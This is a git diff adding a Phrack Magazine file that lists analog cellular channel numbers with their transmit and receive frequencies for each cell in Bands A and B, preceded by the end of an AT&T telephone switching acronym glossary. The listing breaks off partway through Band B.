+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ADTS    -  Automatic Data Test System
+ALIT    -  Automatic Line Insulation Testing
+AMA     -  Automatic Message Accounting
+AP      -  Attached Processor  (1AESS 3B20)
+ATICS   -  Automated Toll Integrity Checking System
+BLV     -  Busy Line Verification
+BMD     -  Batch Mode Display
+BMI     -  Batch Mode Input - TIMEREL and DEMAND
+BMR     -  Batch Mode Release
+BRCS    -  Business Residence Custom Service
+CAMA    -  Centralized Automatic Message Accounting
+CIC     -  Customer Information Center (AT$T)
+DAMT    -  Direct Access Mechanize Testing
+DLTU    -  Digital Line Trunk Unit
+DMERT   -  Duplex Multiple Environment Real Time
+DSU     -  Digital Service Unit
+DTAC    -  Digital Test Access Connector
+GRASP   -  Generic Access Package
+IOP     -  Input/Output Processor
+IPS     -  Integrated Provisioning System
+ISDN    -  Integrated Services Digital Network
+ITNO    -  Item Number
+LMOS    -  Loop Maintenance Operations System
+LU      -  Line Unit
+MCC     -  Master Control Center
+MLT-2   -  Mechanized Loop Testing - The Second Generation of Equipment
+MML     -  Man Machine Language
+MSGNO   -  Message Number
+MSGS    -  Message Switch
+NCT     -  Network Control and Timing
+ODD     -  Office Dependent Data
+OE      -  Office Equipment
+ONI     -  Operator Number Identification
+ORDNO   -  Service Order Number
+OSPS    -  Operator Service Position System
+OSS     -  Operations Support System
+POVT    -  Provisioning On-site Verification Testing
+RC      -  Recent Change
+RC/V    -  Recent Change and Verify
+RDATE   -  Release Date (Update Database Date)
+RMAS    -  Remote Memory Administration
+RTIME   -  Release Time (Update Database Time)
+RTS     -  Remote Test Unit
+SARTS   -  Switched Access Remote Test System
+SCCS    -  Switching Control Center System
+SLC     -  Subicer Loop Carrier
+SM      -  Switching Module
+SMAS    -  Switched Maintenance Access System
+SMPU    -  Switch Module Processor Unit
+SONET   -  Synchronous Optical Network
+SPC     -  Stored Program Control
+STLWS   -  Supplementary Trunk and Line Work Station
+TFTP    -  Television Facility Test Position
+TIMEREL -  Time Release
+TIRKS   -  Trunk Integrated Record Keeping System
+TMS     -  Time Multiplexed Switch
+TRCO    -  Trouble Reporting Control Office
+TSI     -  Time Slot Interchangers
+TSIU    -  Time Slot Interchange Unit
+TU      -  Trunk Unit
+VFY     -  Verify
+
+I give AT$T due credit for much of this file, for without them, it would not
+have been possible!
diff --git a/phrack43/17.txt b/phrack43/17.txt
new file mode 100644
index 0000000..19853f1
--- /dev/null
+++ b/phrack43/17.txt
@@ -0,0 +1,1371 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 17 of 27
+
+                             CELLULAR INFORMATION
+
+                                   COMPILED
+                                      BY
+
+                                    MADJUS
+                                      of
+                                    N.O.D.
+
+                   {Thanks go out to Spy Ace & The Nobody}
+
+
+CELLULAR FREQUENCIES BY CELL
+
+BAND A
+
+Cell # 1                  Transmit        Receive
+--------------------------------------------------
+Channel 1 (333) Tx 879.990 Rx 834.990
+Channel 2 (312) Tx 879.360 Rx 834.360
+Channel 3 (291) Tx 878.730 Rx 833.730
+Channel 4 (270) Tx 878.100 Rx 833.100
+Channel 5 (249) Tx 877.470 Rx 832.470
+Channel 6 (228) Tx 876.840 Rx 831.840
+Channel 7 (207) Tx 876.210 Rx 831.210
+Channel 8 (186) Tx 875.580 Rx 830.580
+Channel 9 (165) Tx 874.950 Rx 829.950
+Channel 10 (144) Tx 874.320 Rx 829.320
+Channel 11 (123) Tx 873.690 Rx 828.690
+Channel 12 (102) Tx 873.060 Rx 828.060
+Channel 13 (81) Tx 872.430 Rx 827.430
+Channel 14 (60) Tx 871.800 Rx 826.800
+Channel 15 (39) Tx 871.170 Rx 826.170
+Channel 16 (18) Tx 870.540 Rx 825.540
+
+Cell # 2
+--------------------------------------------------
+Channel 1 (332) Tx 879.960 Rx 834.960
+Channel 2 (311) Tx 879.330 Rx 834.330
+Channel 3 (290) Tx 878.700 Rx 833.700
+Channel 4 (269) Tx 878.070 Rx 833.070
+Channel 5 (248) Tx 877.440 Rx 832.440
+Channel 6 (227) Tx 876.810 Rx 831.810
+Channel 7 (206) Tx 876.180 Rx 831.180
+Channel 8 (185) Tx 875.550 Rx 830.550
+Channel 9 (164) Tx 874.920 Rx 829.920
+Channel 10 (143) Tx 874.290 Rx 829.290
+Channel 11 (122) Tx 873.660 Rx 828.660
+Channel 12 (101) Tx 873.030 Rx 828.030
+Channel 13 (80) Tx 872.400 Rx 827.400
+Channel 14 (59) Tx 871.770 Rx 826.770
+Channel 15 (38) Tx 871.140 Rx 826.140
+Channel 16 (17) Tx 870.510 Rx 825.510
+
+Cell # 3
+--------------------------------------------------
+Channel 1 (331) Tx 879.930 Rx 834.930
+Channel 2 (310) Tx 879.300 Rx 834.300
+Channel 3 (289) Tx 878.670 Rx 833.670
+Channel 4 (268) Tx 878.040 Rx 833.040
+Channel 5 (247) Tx 877.410 Rx 832.410
+Channel 6 (226) Tx 876.780 Rx 831.780
+Channel 7 (205) Tx 876.150 Rx 831.150
+Channel 8 (184) Tx 875.520 Rx 830.520
+Channel 9 (163) Tx 874.890 Rx 829.890
+Channel 10 (142) Tx 874.260 Rx 829.260
+Channel 11 (121) Tx 873.630 Rx 828.630
+Channel 12 (100) Tx 873.000 Rx 828.000
+Channel 13 (79) Tx 872.370 Rx 827.370
+Channel 14 (58) Tx 871.740 Rx 826.740
+Channel 15 (37) Tx 871.110 Rx 826.110
+Channel 16 (16) Tx 870.480 Rx 825.480
+
+Cell # 4
+--------------------------------------------------
+Channel 1 (330) Tx 879.900 Rx 834.900
+Channel 2 (309) Tx 879.270 Rx 834.270
+Channel 3 (288) Tx 878.640 Rx 833.640
+Channel 4 (267) Tx 878.010 Rx 833.010
+Channel 5 (246) Tx 877.380 Rx 832.380
+Channel 6 (225) Tx 876.750 Rx 831.750
+Channel 7 (204) Tx 876.120 Rx 831.120
+Channel 8 (183) Tx 875.490 Rx 830.490
+Channel 9 (162) Tx 874.860 Rx 829.860
+Channel 10 (141) Tx 874.230 Rx 829.230
+Channel 11 (120) Tx 873.600 Rx 828.600
+Channel 12 (99) Tx 872.970 Rx 827.970
+Channel 13 (78) Tx 872.340 Rx 827.340
+Channel 14 (57) Tx 871.710 Rx 826.710
+Channel 15 (36) Tx 871.080 Rx 826.080
+Channel 16 (15) Tx 870.450 Rx 825.450
+
+Cell # 5
+--------------------------------------------------
+Channel 1 (329) Tx 879.870 Rx 834.870
+Channel 2 (308) Tx 879.240 Rx 834.240
+Channel 3 (287) Tx 878.610 Rx 833.610
+Channel 4 (266) Tx 877.980 Rx 832.980
+Channel 5 (245) Tx 877.350 Rx 832.350
+Channel 6 (224) Tx 876.720 Rx 831.720
+Channel 7 (203) Tx 876.090 Rx 831.090
+Channel 8 (182) Tx 875.460 Rx 830.460
+Channel 9 (161) Tx 874.830 Rx 829.830
+Channel 10 (140) Tx 874.200 Rx 829.200
+Channel 11 (119) Tx 873.570 Rx 828.570
+Channel 12 (98) Tx 872.940 Rx 827.940
+Channel 13 (77) Tx 872.310 Rx 827.310
+Channel 14 (56) Tx 871.680 Rx 826.680
+Channel 15 (35) Tx 871.050 Rx 826.050
+Channel 16 (14) Tx 870.420 Rx 825.420
+
+Cell # 6
+--------------------------------------------------
+Channel 1 (328) Tx 879.840 Rx 834.840
+Channel 2 (307) Tx 879.210 Rx 834.210
+Channel 3 (286) Tx 878.580 Rx 833.580
+Channel 4 (265) Tx 877.950 Rx 832.950
+Channel 5 (244) Tx 877.320 Rx 832.320
+Channel 6 (223) Tx 876.690 Rx 831.690
+Channel 7 (202) Tx 876.060 Rx 831.060
+Channel 8 (181) Tx 875.430 Rx 830.430
+Channel 9 (160) Tx 874.800 Rx 829.800
+Channel 10 (139) Tx 874.170 Rx 829.170
+Channel 11 (118) Tx 873.540 Rx 828.540
+Channel 12 (97) Tx 872.910 Rx 827.910
+Channel 13 (76) Tx 872.280 Rx 827.280
+Channel 14 (55) Tx 871.650 Rx 826.650
+Channel 15 (34) Tx 871.020 Rx 826.020
+Channel 16 (13) Tx 870.390 Rx 825.390
+
+Cell # 7
+--------------------------------------------------
+Channel 1 (327) Tx 879.810 Rx 834.810
+Channel 2 (306) Tx 879.180 Rx 834.180
+Channel 3 (285) Tx 878.550 Rx 833.550
+Channel 4 (264) Tx 877.920 Rx 832.920
+Channel 5 (243) Tx 877.290 Rx 832.290
+Channel 6 (222) Tx 876.660 Rx 831.660
+Channel 7 (201) Tx 876.030 Rx 831.030
+Channel 8 (180) Tx 875.400 Rx 830.400
+Channel 9 (159) Tx 874.770 Rx 829.770
+Channel 10 (138) Tx 874.140 Rx 829.140
+Channel 11 (117) Tx 873.510 Rx 828.510
+Channel 12 (96) Tx 872.880 Rx 827.880
+Channel 13 (75) Tx 872.250 Rx 827.250
+Channel 14 (54) Tx 871.620 Rx 826.620
+Channel 15 (33) Tx 870.990 Rx 825.990
+Channel 16 (12) Tx 870.360 Rx 825.360
+
+Cell # 8
+--------------------------------------------------
+Channel 1 (326) Tx 879.780 Rx 834.780
+Channel 2 (305) Tx 879.150 Rx 834.150
+Channel 3 (284) Tx 878.520 Rx 833.520
+Channel 4 (263) Tx 877.890 Rx 832.890
+Channel 5 (242) Tx 877.260 Rx 832.260
+Channel 6 (221) Tx 876.630 Rx 831.630
+Channel 7 (200) Tx 876.000 Rx 831.000
+Channel 8 (179) Tx 875.370 Rx 830.370
+Channel 9 (158) Tx 874.740 Rx 829.740
+Channel 10 (137) Tx 874.110 Rx 829.110
+Channel 11 (116) Tx 873.480 Rx 828.480
+Channel 12 (95) Tx 872.850 Rx 827.850
+Channel 13 (74) Tx 872.220 Rx 827.220
+Channel 14 (53) Tx 871.590 Rx 826.590
+Channel 15 (32) Tx 870.960 Rx 825.960
+Channel 16 (11) Tx 870.330 Rx 825.330
+
+Cell # 9
+--------------------------------------------------
+Channel 1 (325) Tx 879.750 Rx 834.750
+Channel 2 (304) Tx 879.120 Rx 834.120
+Channel 3 (283) Tx 878.490 Rx 833.490
+Channel 4 (262) Tx 877.860 Rx 832.860
+Channel 5 (241) Tx 877.230 Rx 832.230
+Channel 6 (220) Tx 876.600 Rx 831.600
+Channel 7 (199) Tx 875.970 Rx 830.970
+Channel 8 (178) Tx 875.340 Rx 830.340
+Channel 9 (157) Tx 874.710 Rx 829.710
+Channel 10 (136) Tx 874.080 Rx 829.080
+Channel 11 (115) Tx 873.450 Rx 828.450
+Channel 12 (94) Tx 872.820 Rx 827.820
+Channel 13 (73) Tx 872.190 Rx 827.190
+Channel 14 (52) Tx 871.560 Rx 826.560
+Channel 15 (31) Tx 870.930 Rx 825.930
+Channel 16 (10) Tx 870.300 Rx 825.300
+
+Cell # 10
+--------------------------------------------------
+Channel 1 (324) Tx 879.720 Rx 834.720
+Channel 2 (303) Tx 879.090 Rx 834.090
+Channel 3 (282) Tx 878.460 Rx 833.460
+Channel 4 (261) Tx 877.830 Rx 832.830
+Channel 5 (240) Tx 877.200 Rx 832.200
+Channel 6 (219) Tx 876.570 Rx 831.570
+Channel 7 (198) Tx 875.940 Rx 830.940
+Channel 8 (177) Tx 875.310 Rx 830.310
+Channel 9 (156) Tx 874.680 Rx 829.680
+Channel 10 (135) Tx 874.050 Rx 829.050
+Channel 11 (114) Tx 873.420 Rx 828.420
+Channel 12 (93) Tx 872.790 Rx 827.790
+Channel 13 (72) Tx 872.160 Rx 827.160
+Channel 14 (51) Tx 871.530 Rx 826.530
+Channel 15 (30) Tx 870.900 Rx 825.900
+Channel 16 (9) Tx 870.270 Rx 825.270
+
+Cell # 11
+--------------------------------------------------
+Channel 1 (323) Tx 879.690 Rx 834.690
+Channel 2 (302) Tx 879.060 Rx 834.060
+Channel 3 (281) Tx 878.430 Rx 833.430
+Channel 4 (260) Tx 877.800 Rx 832.800
+Channel 5 (239) Tx 877.170 Rx 832.170
+Channel 6 (218) Tx 876.540 Rx 831.540
+Channel 7 (197) Tx 875.910 Rx 830.910
+Channel 8 (176) Tx 875.280 Rx 830.280
+Channel 9 (155) Tx 874.650 Rx 829.650
+Channel 10 (134) Tx 874.020 Rx 829.020
+Channel 11 (113) Tx 873.390 Rx 828.390
+Channel 12 (92) Tx 872.760 Rx 827.760
+Channel 13 (71) Tx 872.130 Rx 827.130
+Channel 14 (50) Tx 871.500 Rx 826.500
+Channel 15 (29) Tx 870.870 Rx 825.870
+Channel 16 (8) Tx 870.240 Rx 825.240
+
+Cell # 12
+--------------------------------------------------
+Channel 1 (322) Tx 879.660 Rx 834.660
+Channel 2 (301) Tx 879.030 Rx 834.030
+Channel 3 (280) Tx 878.400 Rx 833.400
+Channel 4 (259) Tx 877.770 Rx 832.770
+Channel 5 (238) Tx 877.140 Rx 832.140
+Channel 6 (217) Tx 876.510 Rx 831.510
+Channel 7 (196) Tx 875.880 Rx 830.880
+Channel 8 (175) Tx 875.250 Rx 830.250
+Channel 9 (154) Tx 874.620 Rx 829.620
+Channel 10 (133) Tx 873.990 Rx 828.990
+Channel 11 (112) Tx 873.360 Rx 828.360
+Channel 12 (91) Tx 872.730 Rx 827.730
+Channel 13 (70) Tx 872.100 Rx 827.100
+Channel 14 (49) Tx 871.470 Rx 826.470
+Channel 15 (28) Tx 870.840 Rx 825.840
+Channel 16 (7) Tx 870.210 Rx 825.210
+
+Cell # 13
+--------------------------------------------------
+Channel 1 (321) Tx 879.630 Rx 834.630
+Channel 2 (300) Tx 879.000 Rx 834.000
+Channel 3 (279) Tx 878.370 Rx 833.370
+Channel 4 (258) Tx 877.740 Rx 832.740
+Channel 5 (237) Tx 877.110 Rx 832.110
+Channel 6 (216) Tx 876.480 Rx 831.480
+Channel 7 (195) Tx 875.850 Rx 830.850
+Channel 8 (174) Tx 875.220 Rx 830.220
+Channel 9 (153) Tx 874.590 Rx 829.590
+Channel 10 (132) Tx 873.960 Rx 828.960
+Channel 11 (111) Tx 873.330 Rx 828.330
+Channel 12 (90) Tx 872.700 Rx 827.700
+Channel 13 (69) Tx 872.070 Rx 827.070
+Channel 14 (48) Tx 871.440 Rx 826.440
+Channel 15 (27) Tx 870.810 Rx 825.810
+Channel 16 (6) Tx 870.180 Rx 825.180
+
+Cell # 14
+--------------------------------------------------
+Channel 1 (320) Tx 879.600 Rx 834.600
+Channel 2 (299) Tx 878.970 Rx 833.970
+Channel 3 (278) Tx 878.340 Rx 833.340
+Channel 4 (257) Tx 877.710 Rx 832.710
+Channel 5 (236) Tx 877.080 Rx 832.080
+Channel 6 (215) Tx 876.450 Rx 831.450
+Channel 7 (194) Tx 875.820 Rx 830.820
+Channel 8 (173) Tx 875.190 Rx 830.190
+Channel 9 (152) Tx 874.560 Rx 829.560
+Channel 10 (131) Tx 873.930 Rx 828.930
+Channel 11 (110) Tx 873.300 Rx 828.300
+Channel 12 (89) Tx 872.670 Rx 827.670
+Channel 13 (68) Tx 872.040 Rx 827.040
+Channel 14 (47) Tx 871.410 Rx 826.410
+Channel 15 (26) Tx 870.780 Rx 825.780
+Channel 16 (5) Tx 870.150 Rx 825.150
+
+Cell # 15
+--------------------------------------------------
+Channel 1 (319) Tx 879.570 Rx 834.570
+Channel 2 (298) Tx 878.940 Rx 833.940
+Channel 3 (277) Tx 878.310 Rx 833.310
+Channel 4 (256) Tx 877.680 Rx 832.680
+Channel 5 (235) Tx 877.050 Rx 832.050
+Channel 6 (214) Tx 876.420 Rx 831.420
+Channel 7 (193) Tx 875.790 Rx 830.790
+Channel 8 (172) Tx 875.160 Rx 830.160
+Channel 9 (151) Tx 874.530 Rx 829.530
+Channel 10 (130) Tx 873.900 Rx 828.900
+Channel 11 (109) Tx 873.270 Rx 828.270
+Channel 12 (88) Tx 872.640 Rx 827.640
+Channel 13 (67) Tx 872.010 Rx 827.010
+Channel 14 (46) Tx 871.380 Rx 826.380
+Channel 15 (25) Tx 870.750 Rx 825.750
+Channel 16 (4) Tx 870.120 Rx 825.120
+
+Cell # 16
+--------------------------------------------------
+Channel 1 (318) Tx 879.540 Rx 834.540
+Channel 2 (297) Tx 878.910 Rx 833.910
+Channel 3 (276) Tx 878.280 Rx 833.280
+Channel 4 (255) Tx 877.650 Rx 832.650
+Channel 5 (234) Tx 877.020 Rx 832.020
+Channel 6 (213) Tx 876.390 Rx 831.390
+Channel 7 (192) Tx 875.760 Rx 830.760
+Channel 8 (171) Tx 875.130 Rx 830.130
+Channel 9 (150) Tx 874.500 Rx 829.500
+Channel 10 (129) Tx 873.870 Rx 828.870
+Channel 11 (108) Tx 873.240 Rx 828.240
+Channel 12 (87) Tx 872.610 Rx 827.610
+Channel 13 (66) Tx 871.980 Rx 826.980
+Channel 14 (45) Tx 871.350 Rx 826.350
+Channel 15 (24) Tx 870.720 Rx 825.720
+Channel 16 (3) Tx 870.090 Rx 825.090
+
+Cell # 17
+--------------------------------------------------
+Channel 1 (317) Tx 879.510 Rx 834.510
+Channel 2 (296) Tx 878.880 Rx 833.880
+Channel 3 (275) Tx 878.250 Rx 833.250
+Channel 4 (254) Tx 877.620 Rx 832.620
+Channel 5 (233) Tx 876.990 Rx 831.990
+Channel 6 (212) Tx 876.360 Rx 831.360
+Channel 7 (191) Tx 875.730 Rx 830.730
+Channel 8 (170) Tx 875.100 Rx 830.100
+Channel 9 (149) Tx 874.470 Rx 829.470
+Channel 10 (128) Tx 873.840 Rx 828.840
+Channel 11 (107) Tx 873.210 Rx 828.210
+Channel 12 (86) Tx 872.580 Rx 827.580
+Channel 13 (65) Tx 871.950 Rx 826.950
+Channel 14 (44) Tx 871.320 Rx 826.320
+Channel 15 (23) Tx 870.690 Rx 825.690
+Channel 16 (2) Tx 870.060 Rx 825.060
+
+Cell # 18
+--------------------------------------------------
+Channel 1 (316) Tx 879.480 Rx 834.480
+Channel 2 (295) Tx 878.850 Rx 833.850
+Channel 3 (274) Tx 878.220 Rx 833.220
+Channel 4 (253) Tx 877.590 Rx 832.590
+Channel 5 (232) Tx 876.960 Rx 831.960
+Channel 6 (211) Tx 876.330 Rx 831.330
+Channel 7 (190) Tx 875.700 Rx 830.700
+Channel 8 (169) Tx 875.070 Rx 830.070
+Channel 9 (148) Tx 874.440 Rx 829.440
+Channel 10 (127) Tx 873.810 Rx 828.810
+Channel 11 (106) Tx 873.180 Rx 828.180
+Channel 12 (85) Tx 872.550 Rx 827.550
+Channel 13 (64) Tx 871.920 Rx 826.920
+Channel 14 (43) Tx 871.290 Rx 826.290
+Channel 15 (22) Tx 870.660 Rx 825.660
+Channel 16 (1) Tx 870.030 Rx 825.030
+
+Cell # 19
+--------------------------------------------------
+Channel 1 (315) Tx 879.450 Rx 834.450
+Channel 2 (294) Tx 878.820 Rx 833.820
+Channel 3 (273) Tx 878.190 Rx 833.190
+Channel 4 (252) Tx 877.560 Rx 832.560
+Channel 5 (231) Tx 876.930 Rx 831.930
+Channel 6 (210) Tx 876.300 Rx 831.300
+Channel 7 (189) Tx 875.670 Rx 830.670
+Channel 8 (168) Tx 875.040 Rx 830.040
+Channel 9 (147) Tx 874.410 Rx 829.410
+Channel 10 (126) Tx 873.780 Rx 828.780
+Channel 11 (105) Tx 873.150 Rx 828.150
+Channel 12 (84) Tx 872.520 Rx 827.520
+Channel 13 (63) Tx 871.890 Rx 826.890
+Channel 14 (42) Tx 871.260 Rx 826.260
+Channel 15 (21) Tx 870.630 Rx 825.630
+
+Cell # 20
+--------------------------------------------------
+Channel 1 (314) Tx 879.420 Rx 834.420
+Channel 2 (293) Tx 878.790 Rx 833.790
+Channel 3 (272) Tx 878.160 Rx 833.160
+Channel 4 (251) Tx 877.530 Rx 832.530
+Channel 5 (230) Tx 876.900 Rx 831.900
+Channel 6 (209) Tx 876.270 Rx 831.270
+Channel 7 (188) Tx 875.640 Rx 830.640
+Channel 8 (167) Tx 875.010 Rx 830.010
+Channel 9 (146) Tx 874.380 Rx 829.380
+Channel 10 (125) Tx 873.750 Rx 828.750
+Channel 11 (104) Tx 873.120 Rx 828.120
+Channel 12 (83) Tx 872.490 Rx 827.490
+Channel 13 (62) Tx 871.860 Rx 826.860
+Channel 14 (41) Tx 871.230 Rx 826.230
+Channel 15 (20) Tx 870.600 Rx 825.600
+
+Cell # 21
+--------------------------------------------------
+Channel 1 (313) Tx 879.390 Rx 834.390
+Channel 2 (292) Tx 878.760 Rx 833.760
+Channel 3 (271) Tx 878.130 Rx 833.130
+Channel 4 (250) Tx 877.500 Rx 832.500
+Channel 5 (229) Tx 876.870 Rx 831.870
+Channel 6 (208) Tx 876.240 Rx 831.240
+Channel 7 (187) Tx 875.610 Rx 830.610
+Channel 8 (166) Tx 874.980 Rx 829.980
+Channel 9 (145) Tx 874.350 Rx 829.350
+Channel 10 (124) Tx 873.720 Rx 828.720
+Channel 11 (103) Tx 873.090 Rx 828.090
+Channel 12 (82) Tx 872.460 Rx 827.460
+Channel 13 (61) Tx 871.830 Rx 826.830
+Channel 14 (40) Tx 871.200 Rx 826.200
+Channel 15 (19) Tx 870.570 Rx 825.570
+
+**************************************************
+
+BAND B
+
+Cell # 1
+--------------------------------------------------
+Channel 1       (334)   Tx 880.020      Rx 835.020
+Channel 2 (355) Tx 880.650 Rx 835.650
+Channel 3 (376) Tx 881.280 Rx 836.280
+Channel 4 (397) Tx 881.910 Rx 836.910
+Channel 5 (418) Tx 882.540 Rx 837.540
+Channel 6 (439) Tx 883.170 Rx 838.170
+Channel 7 (460) Tx 883.800 Rx 838.800
+Channel 8 (481) Tx 884.430 Rx 839.430
+Channel 9 (502) Tx 885.060 Rx 840.060
+Channel 10 (523) Tx 885.690 Rx 840.690
+Channel 11 (544) Tx 886.320 Rx 841.320
+Channel 12 (565) Tx 886.950 Rx 841.950
+Channel 13 (586) Tx 887.580 Rx 842.580
+Channel 14 (607) Tx 888.210 Rx 843.210
+Channel 15 (628) Tx 888.840 Rx 843.840
+Channel 16 (649) Tx 889.470 Rx 844.470
+
+Cell # 2
+--------------------------------------------------
+Channel 1 (335) Tx 880.050 Rx 835.050
+Channel 2 (356) Tx 880.680 Rx 835.680
+Channel 3 (377) Tx 881.310 Rx 836.310
+Channel 4 (398) Tx 881.940 Rx 836.940
+Channel 5 (419) Tx 882.570 Rx 837.570
+Channel 6 (440) Tx 883.200 Rx 838.200
+Channel 7 (461) Tx 883.830 Rx 838.830
+Channel 8 (482) Tx 884.460 Rx 839.460
+Channel 9 (503) Tx 885.090 Rx 840.090
+Channel 10 (524) Tx 885.720 Rx 840.720
+Channel 11 (545) Tx 886.350 Rx 841.350
+Channel 12 (566) Tx 886.980 Rx 841.980
+Channel 13 (587) Tx 887.610 Rx 842.610
+Channel 14 (608) Tx 888.240 Rx 843.240
+Channel 15 (629) Tx 888.870 Rx 843.870
+Channel 16 (650) Tx 889.500 Rx 844.500
+
+Cell # 3
+--------------------------------------------------
+Channel 1 (336) Tx 880.080 Rx 835.080
+Channel 2 (357) Tx 880.710 Rx 835.710
+Channel 3 (378) Tx 881.340 Rx 836.340
+Channel 4 (399) Tx 881.970 Rx 836.970
+Channel 5 (420) Tx 882.600 Rx 837.600
+Channel 6 (441) Tx 883.230 Rx 838.230
+Channel 7 (462) Tx 883.860 Rx 838.860
+Channel 8 (483) Tx 884.490 Rx 839.490
+Channel 9 (504) Tx 885.120 Rx 840.120
+Channel 10 (525) Tx 885.750 Rx 840.750
+Channel 11 (546) Tx 886.380 Rx 841.380
+Channel 12 (567) Tx 887.010 Rx 842.010
+Channel 13 (588) Tx 887.640 Rx 842.640
+Channel 14 (609) Tx 888.270 Rx 843.270
+Channel 15 (630) Tx 888.900 Rx 843.900
+Channel 16 (651) Tx 889.530 Rx 844.530
+
+Cell # 4
+--------------------------------------------------
+Channel 1 (337) Tx 880.110 Rx 835.110
+Channel 2 (358) Tx 880.740 Rx 835.740
+Channel 3 (379) Tx 881.370 Rx 836.370
+Channel 4 (400) Tx 882.000 Rx 837.000
+Channel 5 (421) Tx 882.630 Rx 837.630
+Channel 6 (442) Tx 883.260 Rx 838.260
+Channel 7 (463) Tx 883.890 Rx 838.890
+Channel 8 (484) Tx 884.520 Rx 839.520
+Channel 9 (505) Tx 885.150 Rx 840.150
+Channel 10 (526) Tx 885.780 Rx 840.780
+Channel 11 (547) Tx 886.410 Rx 841.410
+Channel 12 (568) Tx 887.040 Rx 842.040
+Channel 13 (589) Tx 887.670 Rx 842.670
+Channel 14 (610) Tx 888.300 Rx 843.300
+Channel 15 (631) Tx 888.930 Rx 843.930
+Channel 16 (652) Tx 889.560 Rx 844.560
+
+Cell # 5
+--------------------------------------------------
+Channel 1 (338) Tx 880.140 Rx 835.140
+Channel 2 (359) Tx 880.770 Rx 835.770
+Channel 3 (380) Tx 881.400 Rx 836.400
+Channel 4 (401) Tx 882.030 Rx 837.030
+Channel 5 (422) Tx 882.660 Rx 837.660
+Channel 6 (443) Tx 883.290 Rx 838.290
+Channel 7 (464) Tx 883.920 Rx 838.920
+Channel 8 (485) Tx 884.550 Rx 839.550
+Channel 9 (506) Tx 885.180 Rx 840.180
+Channel 10 (527) Tx 885.810 Rx 840.810
+Channel 11 (548) Tx 886.440 Rx 841.440
+Channel 12 (569) Tx 887.070 Rx 842.070
+Channel 13 (590) Tx 887.700 Rx 842.700
+Channel 14 (611) Tx 888.330 Rx 843.330
+Channel 15 (632) Tx 888.960 Rx 843.960
+Channel 16 (653) Tx 889.590 Rx 844.590
+
+Cell # 6
+--------------------------------------------------
+Channel 1 (339) Tx 880.170 Rx 835.170
+Channel 2 (360) Tx 880.800 Rx 835.800
+Channel 3 (381) Tx 881.430 Rx 836.430
+Channel 4 (402) Tx 882.060 Rx 837.060
+Channel 5 (423) Tx 882.690 Rx 837.690
+Channel 6 (444) Tx 883.320 Rx 838.320
+Channel 7 (465) Tx 883.950 Rx 838.950
+Channel 8 (486) Tx 884.580 Rx 839.580
+Channel 9 (507) Tx 885.210 Rx 840.210
+Channel 10 (528) Tx 885.840 Rx 840.840
+Channel 11 (549) Tx 886.470 Rx 841.470
+Channel 12 (570) Tx 887.100 Rx 842.100
+Channel 13 (591) Tx 887.730 Rx 842.730
+Channel 14 (612) Tx 888.360 Rx 843.360
+Channel 15 (633) Tx 888.990 Rx 843.990
+Channel 16 (654) Tx 889.620 Rx 844.620
+
+Cell # 7
+--------------------------------------------------
+Channel 1 (340) Tx 880.200 Rx 835.200
+Channel 2 (361) Tx 880.830 Rx 835.830
+Channel 3 (382) Tx 881.460 Rx 836.460
+Channel 4 (403) Tx 882.090 Rx 837.090
+Channel 5 (424) Tx 882.720 Rx 837.720
+Channel 6 (445) Tx 883.350 Rx 838.350
+Channel 7 (466) Tx 883.980 Rx 838.980
+Channel 8 (487) Tx 884.610 Rx 839.610
+Channel 9 (508) Tx 885.240 Rx 840.240
+Channel 10 (529) Tx 885.870 Rx 840.870
+Channel 11 (550) Tx 886.500 Rx 841.500
+Channel 12 (571) Tx 887.130 Rx 842.130
+Channel 13 (592) Tx 887.760 Rx 842.760
+Channel 14 (613) Tx 888.390 Rx 843.390
+Channel 15 (634) Tx 889.020 Rx 844.020
+Channel 16 (655) Tx 889.650 Rx 844.650
+
+Cell # 8
+--------------------------------------------------
+Channel 1 (341) Tx 880.230 Rx 835.230
+Channel 2 (362) Tx 880.860 Rx 835.860
+Channel 3 (383) Tx 881.490 Rx 836.490
+Channel 4 (404) Tx 882.120 Rx 837.120
+Channel 5 (425) Tx 882.750 Rx 837.750
+Channel 6 (446) Tx 883.380 Rx 838.380
+Channel 7 (467) Tx 884.010 Rx 839.010
+Channel 8 (488) Tx 884.640 Rx 839.640
+Channel 9 (509) Tx 885.270 Rx 840.270
+Channel 10 (530) Tx 885.900 Rx 840.900
+Channel 11 (551) Tx 886.530 Rx 841.530
+Channel 12 (572) Tx 887.160 Rx 842.160
+Channel 13 (593) Tx 887.790 Rx 842.790
+Channel 14 (614) Tx 888.420 Rx 843.420
+Channel 15 (635) Tx 889.050 Rx 844.050
+Channel 16 (656) Tx 889.680 Rx 844.680
+
+Cell # 9
+--------------------------------------------------
+Channel 1 (342) Tx 880.260 Rx 835.260
+Channel 2 (363) Tx 880.890 Rx 835.890
+Channel 3 (384) Tx 881.520 Rx 836.520
+Channel 4 (405) Tx 882.150 Rx 837.150
+Channel 5 (426) Tx 882.780 Rx 837.780
+Channel 6 (447) Tx 883.410 Rx 838.410
+Channel 7 (468) Tx 884.040 Rx 839.040
+Channel 8 (489) Tx 884.670 Rx 839.670
+Channel 9 (510) Tx 885.300 Rx 840.300
+Channel 10 (531) Tx 885.930 Rx 840.930
+Channel 11 (552) Tx 886.560 Rx 841.560
+Channel 12 (573) Tx 887.190 Rx 842.190
+Channel 13 (594) Tx 887.820 Rx 842.820
+Channel 14 (615) Tx 888.450 Rx 843.450
+Channel 15 (636) Tx 889.080 Rx 844.080
+Channel 16 (657) Tx 889.710 Rx 844.710
+
+Cell # 10
+--------------------------------------------------
+Channel 1 (343) Tx 880.290 Rx 835.290
+Channel 2 (364) Tx 880.920 Rx 835.920
+Channel 3 (385) Tx 881.550 Rx 836.550
+Channel 4 (406) Tx 882.180 Rx 837.180
+Channel 5 (427) Tx 882.810 Rx 837.810
+Channel 6 (448) Tx 883.440 Rx 838.440
+Channel 7 (469) Tx 884.070 Rx 839.070
+Channel 8 (490) Tx 884.700 Rx 839.700
+Channel 9 (511) Tx 885.330 Rx 840.330
+Channel 10 (532) Tx 885.960 Rx 840.960
+Channel 11 (553) Tx 886.590 Rx 841.590
+Channel 12 (574) Tx 887.220 Rx 842.220
+Channel 13 (595) Tx 887.850 Rx 842.850
+Channel 14 (616) Tx 888.480 Rx 843.480
+Channel 15 (637) Tx 889.110 Rx 844.110
+Channel 16 (658) Tx 889.740 Rx 844.740
+
+Cell # 11
+--------------------------------------------------
+Channel 1 (344) Tx 880.320 Rx 835.320
